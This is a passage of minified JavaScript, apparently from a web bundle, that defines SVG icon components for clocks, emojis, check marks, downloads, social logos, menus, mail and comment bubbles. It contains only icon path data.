22.75ZM11 6a1 1 0 1 1 2 0v5.382l3.447 1.723.09.051a1 1 0 0 1-.89 1.78l-.094-.041-4-2A1 1 0 0 1 11 12V6Z",clipRule:"evenodd"})),clock_reading_time_2_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M11 2.5V1.296A10.753 10.753 0 0 0 1.296 11H2.5a1 1 0 1 1 0 2H1.296A10.753 10.753 0 0 0 11 22.704V21.5a1 1 0 1 1 2 0v1.204A10.753 10.753 0 0 0 22.704 13H21.5a1 1 0 1 1 0-2h1.204A10.753 10.753 0 0 0 13 1.296V2.5a1 1 0 1 1-2 0Zm5.707 4.793a1 1 0 0 0-1.414 0L12 10.586l-1.793-1.793-.076-.068a1 1 0 0 0-1.338 1.482L10.586 12l-.793.793a1 1 0 1 0 1.414 1.414l.793-.793.793.793.076.068a1 1 0 0 0 1.406-1.406l-.068-.076-.793-.793 3.293-3.293a1 1 0 0 0 0-1.414Z",clipRule:"evenodd"})),clock_reading_time_3_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M15.5 1.25a7.25 7.25 0 0 1 7.25 7.25 7.222 7.222 0 0 1-2.001 4.997L20.75 16A6.75 6.75 0 0 1 14 22.75H2a.75.75 0 0 1-.75-.75v-7A6.75 6.75 0 0 1 8 8.25h.257a7.248 7.248 0 0 1 7.243-7Zm0 1.5a5.75 5.75 0 1 0 0 11.5 5.75 5.75 0 0 0 0-11.5ZM14 18.5a1 1 0 0 0-1-1H6a1 1 0 1 0 0 2h7a1 1 0 0 0 1-1Zm-5-5a1 1 0 1 1 0 2H6a1 1 0 1 1 0-2h3Z",clipRule:"evenodd"}),(0,a.createElement)("path",{d:"M14.5 5.111a1 1 0 1 1 2 0v3.3l1.485.826.087.054a1 1 0 0 1-.966 1.739l-.091-.045-2-1.111A1 1 0 0 1 14.5 9V5.11Z"})),confused_emoji_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M12 1.25C6.063 1.25 1.25 6.063 1.25 12S6.063 22.75 12 22.75 22.75 17.937 22.75 12 17.937 1.25 12 1.25ZM8.5 9a1 1 0 0 1 1 1v1.5a1 1 0 1 1-2 0V10a1 1 0 0 1 1-1Zm7 0a1 1 0 0 1 1 1v1.5a1 1 0 1 1-2 0V10a1 1 0 0 1 1-1Zm-5.95 8.51c.63-.68 2.871-2.237 6.317-1.617a.75.75 0 1 0 .266-1.476c-4.02-.723-6.758 1.075-7.683 2.073a.75.75 0 1 0 1.1 1.02Z",clipRule:"evenodd"})),correct_save_check_circle_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M12 1.25C6.063 1.25 1.25 6.063 1.25 12S6.063 22.75 12 22.75 22.75 17.937 22.75 12 17.937 1.25 12 1.25Zm4.737 8.426a1 1 0 0 0-1.474-1.352l-4.794 5.23-1.762-1.761a1 1 0 0 0-1.414 1.414l2.5 2.5a1 1 0 0 0 1.444-.031l5.5-6Z",clipRule:"evenodd"})),correct_save_check_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M18.731 5.36a1 1 0 0 1 1.537 1.28l-10 12a1.001 1.001 0 0 1-1.475.067l-5-5a1 1 0 1 1 1.414-1.414l4.225 4.225 9.3-11.159Z"})),cross_close_x_minimize_circle_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M12 1.25C6.063 1.25 1.25 6.063 1.25 12S6.063 22.75 12 22.75 22.75 17.937 22.75 12 17.937 1.25 12 1.25ZM8.707 7.293a1 1 0 0 0-1.414 1.414L10.586 12l-3.293 3.293a1 1 0 1 0 1.414 1.414L12 13.414l3.293 3.293a1 1 0 0 0 1.414-1.414L13.414 12l3.293-3.293a1 1 0 0 0-1.414-1.414L12 10.586 8.707 7.293Z",clipRule:"evenodd"})),cross_x_close_minimize_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M17.293 5.293a1 1 0 1 1 1.414 1.414L13.414 12l5.293 5.293.068.076a1 1 0 0 1-1.406 1.406l-.076-.068L12 13.414l-5.293 5.293a1 1 0 1 1-1.414-1.414L10.586 12 5.293 6.707a1 1 0 1 1 1.414-1.414L12 10.586l5.293-5.293Z"})),desktop_monitor_computer_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M11 17.75H4A2.75 2.75 0 0 1 1.25 15V5A2.75 2.75 0 0 1 4 2.25h16A2.75 2.75 0 0 1 22.75 5v10A2.75 2.75 0 0 1 20 17.75h-7V20h3a1 1 0 1 1 0 2H8a1 1 0 1 1 0-2h3v-2.25Zm1.01-5.25a1 1 0 1 1 0 2c-.553 0-1.01-.448-1.01-1s.457-1 1.01-1Z",clipRule:"evenodd"})),dot_circle_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M12 1.25C6.063 1.25 1.25 6.063 1.25 12S6.063 22.75 12 22.75 22.75 17.937 22.75 12 17.937 1.25 12 1.25Z",clipRule:"evenodd"})),download_1_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M2 19v-4a1 1 0 1 1 2 0v4c0 .548.452 1 1 1h14a1 1 0 0 0 1-1v-4a1 1 0 1 1 2 0v4a3 3 0 0 1-3 3H5c-1.652 0-3-1.348-3-3Z"}),(0,a.createElement)("path",{d:"M12 1.5a1 1 0 0 0-1 1V8H7a1 1 0 0 0-.707 1.707l5 5a1 1 0 0 0 1.414 0l5-5A1 1 0 0 0 17 8h-4V2.5a1 1 0 0 0-1-1Z"})),download_2_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M11.47 21.53a.75.75 0 0 0 1.06 0l2.5-2.5a.75.75 0 0 0-.53-1.28h-1.75V13a.75.75 0 0 0-1.5 0v4.75H9.5a.75.75 0 0 0-.53 1.28l2.5 2.5Z",clipRule:"evenodd"}),(0,a.createElement)("path",{fillRule:"evenodd",d:"M5.5 9.236a.865.865 0 0 0 .107-.04 3.548 3.548 0 0 1 2.123-.062 1 1 0 0 0 .54-1.925 5.583 5.583 0 0 0-1.467-.21 6 6 0 0 1 10.803 5.144 1 1 0 1 0 1.869.714c.163-.427.29-.872.38-1.33A3.081 3.081 0 0 1 21 13.936c0 1.437-.966 2.632-2.253 2.968a1 1 0 1 0 .506 1.935C21.417 18.274 23 16.286 23 13.936a5.067 5.067 0 0 0-3.032-4.656 8 8 0 0 0-15.58-1.745c-1.528.723-2.734 2.128-3.193 3.924-.806 3.156.967 6.46 4.068 7.332.189.053.378.096.568.128a1 1 0 1 0 .34-1.97 3.61 3.61 0 0 1-.367-.083c-1.983-.558-3.227-2.735-2.671-4.912.339-1.328 1.255-2.296 2.366-2.718Z",clipRule:"evenodd"})),facebook_logo_icon_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M5 2.25A2.75 2.75 0 0 0 2.25 5v14A2.75 2.75 0 0 0 5 21.75h6.412v-7.076H9.5V11.84h1.912v-1.22C11.412 7.462 12.84 6 15.94 6c.587 0 1.601.115 2.016.23V8.8a11.904 11.904 0 0 0-1.071-.035c-1.52 0-2.108.575-2.108 2.073v1.002h3.029l-.52 2.834h-2.51v7.076H19A2.75 2.75 0 0 0 21.75 19V5A2.75 2.75 0 0 0 19 2.25H5Z"})),google_logo_icon_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"m21.882 10.42-.103-.438h-9.485v4.036h5.667c-.588 2.81-3.318 4.289-5.549 4.289-1.623 0-3.333-.686-4.465-1.79a6.412 6.412 0 0 1-1.902-4.524c0-1.7.76-3.402 1.865-4.52 1.106-1.12 2.776-1.745 4.437-1.745 1.902 0 3.264 1.015 3.774 1.478l2.853-2.853c-.837-.74-3.136-2.603-6.72-2.603-2.764 0-5.414 1.065-7.352 3.007C2.99 6.669 2 9.434 2 12c0 2.566.937 5.193 2.79 7.12 1.98 2.056 4.784 3.13 7.671 3.13 2.627 0 5.117-1.035 6.892-2.913C21.098 17.488 22 14.93 22 12.249c0-1.129-.113-1.8-.118-1.829Z"})),growth_increase_up_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M21 6a1 1 0 0 1 1 1v6a1 1 0 0 1-1.706.707L18 11.414l-4.793 4.793a1 1 0 0 1-1.414 0L8.5 12.914l-4.993 4.993a1 1 0 0 1-1.414-1.414l5.7-5.7.073-.066a1 1 0 0 1 1.34.066l3.294 3.293L16.587 10l-2.293-2.293A1 1 0 0 1 15 6h6Z"})),hamicon_4_sloid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M3 3h18v3H3zm0 7.5h18v3H3v-3ZM3 18h18v3H3v-3Z"})),hamicon_5_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M4 5a1 1 0 0 1 1-1h1a1 1 0 0 1 1 1v1a1 1 0 0 1-1 1H5a1 1 0 0 1-1-1V5Zm0 6.5a1 1 0 0 1 1-1h1a1 1 0 0 1 1 1v1a1 1 0 0 1-1 1H5a1 1 0 0 1-1-1v-1ZM4 18a1 1 0 0 1 1-1h1a1 1 0 0 1 1 1v1a1 1 0 0 1-1 1H5a1 1 0 0 1-1-1v-1Zm6.5-13a1 1 0 0 1 1-1h1a1 1 0 0 1 1 1v1a1 1 0 0 1-1 1h-1a1 1 0 0 1-1-1V5Zm0 6.5a1 1 0 0 1 1-1h1a1 1 0 0 1 1 1v1a1 1 0 0 1-1 1h-1a1 1 0 0 1-1-1v-1Zm0 6.5a1 1 0 0 1 1-1h1a1 1 0 0 1 1 1v1a1 1 0 0 1-1 1h-1a1 1 0 0 1-1-1v-1ZM17 5a1 1 0 0 1 1-1h1a1 1 0 0 1 1 1v1a1 1 0 0 1-1 1h-1a1 1 0 0 1-1-1V5Zm0 6.5a1 1 0 0 1 1-1h1a1 1 0 0 1 1 1v1a1 1 0 0 1-1 1h-1a1 1 0 0 1-1-1v-1Zm0 6.5a1 1 0 0 1 1-1h1a1 1 0 0 1 1 1v1a1 1 0 0 1-1 1h-1a1 1 0 0 1-1-1v-1Z"})),hamicon_6_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M10 12a2 2 0 1 1 4 0 2 2 0 0 1-4 0Zm0-7a2 2 0 1 1 4 0 2 2 0 0 1-4 0Zm0 14a2 2 0 1 1 4 0 2 2 0 0 1-4 0Z"})),happy_emoji_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M12 1.25C6.063 1.25 1.25 6.063 1.25 12S6.063 22.75 12 22.75 22.75 17.937 22.75 12 17.937 1.25 12 1.25ZM8.5 7a1 1 0 0 1 1 1v1.5a1 1 0 1 1-2 0V8a1 1 0 0 1 1-1Zm7 0a1 1 0 0 1 1 1v1.5a1 1 0 0 1-2 0V8a1 1 0 0 1 1-1Zm-8 5.575a.675.675 0 0 0-.675.675 5.175 5.175 0 1 0 10.35 0 .675.675 0 0 0-.675-.675h-9Z",clipRule:"evenodd"})),heart_love_wishlist_favourite_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M20.433 5.288a5.797 5.797 0 0 0-8.198 0L12 5.523l-.235-.235a5.797 5.797 0 0 0-8.198 0 6.428 6.428 0 0 0 0 9.09l7.52 7.52a1.292 1.292 0 0 0 1.826 0l7.519-7.52a6.428 6.428 0 0 0 0-9.09Zm-4.169 1.285a1 1 0 1 0 0 2c.299 0 .595.114.822.341.323.323.46.76.41 1.183a1 1 0 0 0 1.986.234A3.43 3.43 0 0 0 18.5 7.5a3.156 3.156 0 0 0-2.236-.927Z",clipRule:"evenodd"})),hemicon_1_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M3 5a1 1 0 0 1 1-1h16a1 1 0 1 1 0 2H4a1 1 0 0 1-1-1Zm0 7a1 1 0 0 1 1-1h11.5a1 1 0 1 1 0 2H4a1 1 0 0 1-1-1Zm0 7a1 1 0 0 1 1-1h16a1 1 0 1 1 0 2H4a1 1 0 0 1-1-1Z"})),hemicon_2_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M3 5a1 1 0 0 1 1-1h16a1 1 0 1 1 0 2H4a1 1 0 0 1-1-1Zm0 7a1 1 0 0 1 1-1h16a1 1 0 1 1 0 2H4a1 1 0 0 1-1-1Zm0 7a1 1 0 0 1 1-1h16a1 1 0 1 1 0 2H4a1 1 0 0 1-1-1Z"})),hemicon_3_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M3 5a1 1 0 0 1 1-1h16a1 1 0 1 1 0 2H4a1 1 0 0 1-1-1Zm0 7a1 1 0 0 1 1-1h11.5a1 1 0 1 1 0 2H4a1 1 0 0 1-1-1Zm0 7a1 1 0 0 1 1-1h7.5a1 1 0 1 1 0 2H4a1 1 0 0 1-1-1Z"})),hidden_hide_invisible_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M19.87 3.07a.75.75 0 0 1 1.06 1.061l-16.799 16.8a.75.75 0 0 1-1.06-1.06l1.857-1.859c-1.397-1.145-2.487-2.454-3.25-3.516a20.19 20.19 0 0 1-1.255-1.985 9.52 9.52 0 0 1-.067-.127l-.025-.049a.758.758 0 0 1 0-.673l.015-.03.016-.03.016-.03.007-.014a18.243 18.243 0 0 1 .72-1.217A20.435 20.435 0 0 1 3.33 7.486c1.938-2.067 4.873-4.237 8.672-4.238 2.269 0 4.231.778 5.852 1.84L19.87 3.07ZM8.874 14.067A3.73 3.73 0 0 1 8.25 12 3.75 3.75 0 0 1 12 8.25a3.73 3.73 0 0 1 2.066.624l-5.192 5.192Zm11.657-6.405c.205.008.397.1.533.253a20.672 20.672 0 0 1 1.933 2.583 17.693 17.693 0 0 1 .661 1.138l.01.019a.77.77 0 0 1 .004.68l-.016.03-.032.06-.007.014a18.22 18.22 0 0 1-.72 1.217 20.427 20.427 0 0 1-2.224 2.855c-1.938 2.067-4.872 4.237-8.672 4.237a9.97 9.97 0 0 1-3.243-.545.752.752 0 0 1-.277-1.25l11.5-11.082.057-.05a.753.753 0 0 1 .493-.16Z",clipRule:"evenodd"})),home_house_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M21.75 19A2.75 2.75 0 0 1 19 21.75h-3.5A1.75 1.75 0 0 1 13.75 20v-5a.25.25 0 0 0-.25-.25h-3a.25.25 0 0 0-.25.25v5a1.75 1.75 0 0 1-1.75 1.75H5A2.75 2.75 0 0 1 2.25 19v-8.1c0-.786.336-1.534.923-2.056l7-6.223a2.75 2.75 0 0 1 3.654 0l7 6.223a2.75 2.75 0 0 1 .923 2.056V19Z"})),hourglass_timer_time_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M20 1.25a.75.75 0 0 1 0 1.5h-1.25v4.18c0 .92-.46 1.778-1.225 2.288L13.352 12l4.173 2.782a2.75 2.75 0 0 1 1.225 2.288v4.18H20a.75.75 0 0 1 0 1.5H4a.75.75 0 0 1 0-1.5h1.25v-4.18c0-.92.46-1.778 1.225-2.288L10.648 12 6.475 9.218A2.75 2.75 0 0 1 5.25 6.93V2.75H4a.75.75 0 0 1 0-1.5h16ZM13.75 16.5a.75.75 0 0 0-.75-.75h-2a.75.75 0 0 0 0 1.5h2a.75.75 0 0 0 .75-.75Zm.75 2.25a.75.75 0 0 1 0 1.5h-5a.75.75 0 0 1 0-1.5h5Z",clipRule:"evenodd"})),instagram_logo_icon_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M9 12a3 3 0 1 1 6 0 3 3 0 0 1-6 0Z"}),(0,a.createElement)("path",{fillRule:"evenodd",d:"M5 2.25A2.75 2.75 0 0 0 2.25 5v14A2.75 2.75 0 0 0 5 21.75h14A2.75 2.75 0 0 0 21.75 19V5A2.75 2.75 0 0 0 19 2.25H5Zm12.5 5.5a1.25 1.25 0 1 0 0-2.5 1.25 1.25 0 0 0 0 2.5ZM12 7a5 5 0 1 0 0 10 5 5 0 0 0 0-10Z",clipRule:"evenodd"})),laptop_computer_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M2.75 15.25V6A2.75 2.75 0 0 1 5.5 3.25h13A2.75 2.75 0 0 1 21.25 6v9.25H2.75ZM13.5 6a1 1 0 1 1 0 2h-3a1 1 0 1 1 0-2h3ZM1.25 18v-1.25h21.5V18A2.75 2.75 0 0 1 20 20.75H4A2.75 2.75 0 0 1 1.25 18Z",clipRule:"evenodd"})),left_align_1_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M21 2a1 1 0 1 1 0 2H3a1 1 0 0 1 0-2h18ZM11 20a1 1 0 1 1 0 2H3a1 1 0 1 1 0-2h8Zm10-6a1 1 0 1 1 0 2H3a1 1 0 1 1 0-2h18ZM11 8a1 1 0 1 1 0 2H3a1 1 0 0 1 0-2h8Z"})),left_triangle_angle_arrow_backward_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M17.75 19c0 1.442-1.646 2.265-2.8 1.4l-9.333-7a1.75 1.75 0 0 1 0-2.8l9.333-7c1.154-.865 2.8-.042 2.8 1.4v14Z"})),linkedin_logo_icon_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M5 2.25A2.75 2.75 0 0 0 2.25 5v14A2.75 2.75 0 0 0 5 21.75h14A2.75 2.75 0 0 0 21.75 19V5A2.75 2.75 0 0 0 19 2.25H5Zm11.15 16.792h2.893v-5.945c0-2.515-1.425-3.731-3.417-3.731-1.992 0-2.83 1.552-2.83 1.552V9.652h-2.79v9.389h2.79v-4.929c0-1.32.607-2.106 1.77-2.106 1.07 0 1.584.755 1.584 2.106v4.929ZM4.96 6.69c0 .957.77 1.732 1.72 1.732s1.719-.775 1.719-1.732-.77-1.733-1.72-1.733S4.96 5.733 4.96 6.69Zm3.188 12.35H5.24V9.654h2.908v9.389Z",clipRule:"evenodd"})),link_chains_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M6.264 9.281a1 1 0 0 1 1.415 1.415L5.165 13.21a3.977 3.977 0 1 0 5.625 5.625l2.514-2.514a1 1 0 0 1 1.415 1.414l-2.515 2.514a5.977 5.977 0 1 1-8.453-8.453L6.264 9.28Zm5.532-5.53a5.977 5.977 0 1 1 8.453 8.453l-2.514 2.515a1 1 0 0 1-1.414-1.415l2.514-2.514a3.977 3.977 0 1 0-5.625-5.625l-2.514 2.514a1.001 1.001 0 0 1-1.415-1.414l2.515-2.514Z"}),(0,a.createElement)("path",{d:"M13.793 8.793a1 1 0 1 1 1.414 1.414l-5 5a1 1 0 0 1-1.414-1.414l5-5Z"})),location_gps_map_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M11.625 22.65 12 22l.375.65a.75.75 0 0 1-.75 0Z"}),(0,a.createElement)("path",{fillRule:"evenodd",d:"M11.625 22.65 12 22c.375.65.376.649.376.649l.002-.001.006-.004.02-.012.034-.02.04-.024a19.765 19.765 0 0 0 1.212-.814 22.44 22.44 0 0 0 2.847-2.456c2.058-2.11 4.213-5.239 4.213-9.113 0-4.928-3.9-8.955-8.75-8.955s-8.75 4.027-8.75 8.955c0 3.874 2.155 7.002 4.213 9.113a22.436 22.436 0 0 0 3.788 3.101 12.961 12.961 0 0 0 .344.213l.021.012.006.004.003.001ZM12 6.25a3.75 3.75 0 1 0 0 7.5 3.75 3.75 0 0 0 0-7.5Z",clipRule:"evenodd"})),long_arrow_up_top_increase_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M11 21V10H6a1 1 0 0 1-.707-1.707l6-6 .076-.068a1 1 0 0 1 1.338.068l6 6A1 1 0 0 1 18 10h-5v11a1 1 0 1 1-2 0Z"})),mail_email_messege_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M4 3.25A2.75 2.75 0 0 0 1.25 6v12A2.75 2.75 0 0 0 4 20.75h16A2.75 2.75 0 0 0 22.75 18V6A2.75 2.75 0 0 0 20 3.25H4ZM6.6 7.2a1 1 0 1 0-1.2 1.6l4.8 3.6a3 3 0 0 0 3.6 0l4.8-3.6a1 1 0 0 0-1.2-1.6l-4.8 3.6a1 1 0 0 1-1.2 0L6.6 7.2Z",clipRule:"evenodd"})),media_document_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M2.25 19V5A2.75 2.75 0 0 1 5 2.25h10.172c.73 0 1.429.29 1.944.806l3.828 3.828a2.75 2.75 0 0 1 .806 1.944V19A2.75 2.75 0 0 1 19 21.75H5A2.75 2.75 0 0 1 2.25 19ZM15 15.5a1 1 0 0 0-1-1H8a1 1 0 1 0 0 2h6a1 1 0 0 0 1-1Zm-2-7a1 1 0 0 0-1-1H8a1 1 0 0 0 0 2h4a1 1 0 0 0 1-1Zm4 3.5a1 1 0 0 0-1-1H8a1 1 0 1 0 0 2h8a1 1 0 0 0 1-1Z"})),messege_comment_1_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M22.75 16A2.75 2.75 0 0 1 20 18.75H7.264l-4.795 3.836A.75.75 0 0 1 1.25 22V7A2.75 2.75 0 0 1 4 4.25h16A2.75 2.75 0 0 1 22.75 7v9ZM14 9.75a1 1 0 0 0-1-1H9a1 1 0 1 0 0 2h4a1 1 0 0 0 1-1Zm1 2.5a1 1 0 1 1 0 2H9a1 1 0 1 1 0-2h6Z",clipRule:"evenodd"})),messege_comment_2_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M22.75 15A2.75 2.75 0 0 1 20 17.75h-6.236l-4.795 3.836A.75.75 0 0 1 7.75 21v-3.25H4A2.75 2.75 0 0 1 1.25 15V6A2.75 2.75 0 0 1 4 3.25h16A2.75 2.75 0 0 1 22.75 6v9ZM14 8.75a1 1 0 0 0-1-1H9a1 1 0 1 0 0 2h4a1 1 0 0 0 1-1Zm1 2.5a1 1 0 1 1 0 2H9a1 1 0 1 1 0-2h6Z",clipRule:"evenodd"})),messege_comment_3_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M4 3.25A2.75 2.75 0 0 0 1.25 6v9A2.75 2.75 0 0 0 4 17.75h3.75V21a.75.75 0 0 0 1.219.586l4.794-3.836H20A2.75 2.75 0 0 0 22.75 15V6A2.75 2.75 0 0 0 20 3.25H4ZM9 10a1 1 0 0 0-2 0v1a1 1 0 1 0 2 0v-1Zm3-1a1 1 0 0 1 1 1v1a1 1 0 1 1-2 0v-1a1 1 0 0 1 1-1Zm5 1a1 1 0 1 0-2 0v1a1 1 0 1 0 2 0v-1Z",clipRule:"evenodd"})),messege_comment_4_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M22.75 15A2.75 2.75 0 0 1 20 17.75h-6.236l-4.795 3.836A.75.75 0 0 1 7.75 21v-3.25H4A2.75 2.75 0 0 1 1.25 15V6A2.75 2.75 0 0 1 4 3.25h16A2.75 2.75 0 0 1 22.75 6v9Z"})),messege_comment_5_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M21.75 12A9.75 9.75 0 0 1 12 21.75H3a.75.75 0 0 1-.75-.75v-9c0-5.385 4.365-9.75 9.75-9.75s9.75 4.365 9.75 9.75ZM16 10.25a1 1 0 0 0-1-1H9a1 1 0 1 0 0 2h6a1 1 0 0 0 1-1Zm-1 2.5a1 1 0 1 1 0 2H9a1 1 0 1 1 0-2h6Z",clipRule:"evenodd"})),messege_comment_6_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M17 3.25A5.75 5.75 0 0 1 22.75 9v7a.75.75 0 0 1-.75.75h-5.31a4.75 4.75 0 0 1-4.69 4H2a.75.75 0 0 1-.75-.75v-6a4.751 4.751 0 0 1 4-4.691V9A5.75 5.75 0 0 1 11 3.25h6ZM5.25 10.838A3.25 3.25 0 0 0 2.75 14v5.25H12a3.25 3.25 0 0 0 3.162-2.5H11A5.75 5.75 0 0 1 5.25 11v-.162ZM11 10.75a1 1 0 1 0 0 2h6a1 1 0 1 0 0-2h-6Zm0-3.5a1 1 0 1 0 0 2h4a1 1 0 1 0 0-2h-4Z",clipRule:"evenodd"})),messege_comment_7_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M22.75 11.5c0 5.218-4.932 9.25-10.75 9.25-.921 0-1.817-.101-2.672-.29l-2.956 1.691A.75.75 0 0 1 5.25 21.5v-2.8c-2.411-1.675-4-4.258-4-7.2 0-5.218 4.932-9.25 10.75-9.25s10.75 4.032 10.75 9.25ZM16 10.25a1 1 0 0 0-1-1H9a1 1 0 1 0 0 2h6a1 1 0 0 0 1-1Zm-2 2.5a1 1 0 1 1 0 2h-4a1 1 0 1 1 0-2h4Z",clipRule:"evenodd"})),messege_comment_8_solid:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,a.createElement)("path",{fillRule:"evenodd",d:"M14.5 3.25c4.542 0 8.25 3.613 8.25 8.102 0 2.519-1.172 4.764-3 6.247V20a.75.75 0 0 1-1.163.626l-2.13-1.404a8.41 8.41 0 0 1-1.957.231 8.323 8.323 0 0 1-4.61-1.382 7.867 7.867 0 0 1-3.075-.06l-1.82 1.127A.75.75 0 0 1 3.85 18.5v-1.87c-1.576-1.222-2.6-3.07-2.6-5.157C1.25 7.7 4.557 4.75 8.5 4.75c.319 0 .634.02.942.057a.755.755 0 0 1 .15.033A8.318 8.318 0 0 1 14.5 3.25ZM8.08 6.265c-3.03.195-5.33 2.505-5.33 5.208 0 1.68.878 3.196 2.276 4.162a.75.75 0 0 1 .324.617v.903l.943-.583a.75.75 0 0 1 .587-.086c.45.12.925.188 1.416.203A7.98 7.98 0 0 1 8.08 